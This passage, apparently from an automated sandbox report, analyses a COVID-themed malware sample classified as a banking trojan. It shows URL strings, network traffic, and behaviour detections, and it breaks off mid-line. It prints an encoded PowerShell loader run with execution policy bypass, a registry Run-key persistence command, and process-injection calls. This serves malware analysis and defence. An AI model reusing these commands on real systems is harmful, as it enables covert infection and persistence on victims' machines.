    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/mega-menu/emergencies/public-health-emergency--dashboard
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/redirect-pages/page/novel-coronavirus-(covid-19)-situation-dashboard
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/ru/home
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/southeastasia
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/westernpacific/
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.who.int/zh/home
    Source: FL794448.htm.7.dr String found in binary or memory: https://www.youtube.com/embed/yEIPefMsf70
    Source: base[1].js.7.dr String found in binary or memory: https://www.youtube.com/generate_204?cpn=
    Source: base[1].js.7.dr String found in binary or memory: https://youtu.be/
    Source: base[1].js.7.dr String found in binary or memory: https://youtube.com/api/drm/fps?ek=uninitialized
    Source: base[1].js.7.dr String found in binary or memory: https://youtubei.googleapis.com/youtubei/
    Source: base[1].js.7.dr String found in binary or memory: https://yurt.corp.google.com
    Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49708 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 23.111.9.35:443 -> 192.168.2.3:49709 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49712 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 199.232.136.157:443 -> 192.168.2.3:49713 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49735 version: TLS 1.2
    Source: unknown HTTPS traffic detected: 172.217.168.2:443 -> 192.168.2.3:49734 version: TLS 1.2

    E-Banking Fraud:

    Malicious encrypted Powershell command line found
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A

    System Summary:

    Powershell drops PE file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\buyonegetone.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68604761C NtQueueApcThread
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860473EC NtResumeThread
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047494 NtAllocateVirtualMemory
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047478 NtWriteVirtualMemory
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE10761C NtQueueApcThread
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1073EC NtResumeThread
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107494 NtAllocateVirtualMemory
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107478 NtWriteVirtualMemory
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67478 NtWriteVirtualMemory
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67494 NtAllocateVirtualMemory
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D673EC NtResumeThread
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D6761C NtQueueApcThread
    Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
    Source: covid.exe Static PE information: invalid certificate
    Source: covid.exe Binary or memory string: OriginalFilename vs covid.exe
    Source: covid.exe, 00000000.00000002.302616410.0000000000C72000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmp Binary or memory string: originalfilename vs covid.exe
    Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs covid.exe
    Source: covid.exe, 00000000.00000002.304256413.00000000031A0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs covid.exe
    Source: covid.exe, 00000000.00000002.303581212.000000000156A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs covid.exe
    Source: covid.exe Binary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
    Source: covid.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@32/132@14/13
    Source: C:\Users\user\Desktop\covid.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.log
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:244:120:WilError_01
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
    Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6224
    Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5504
    Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1
    Source: covid.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\covid.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Users\user\Desktop\covid.exe File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\covid.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\System32\WerFault.exe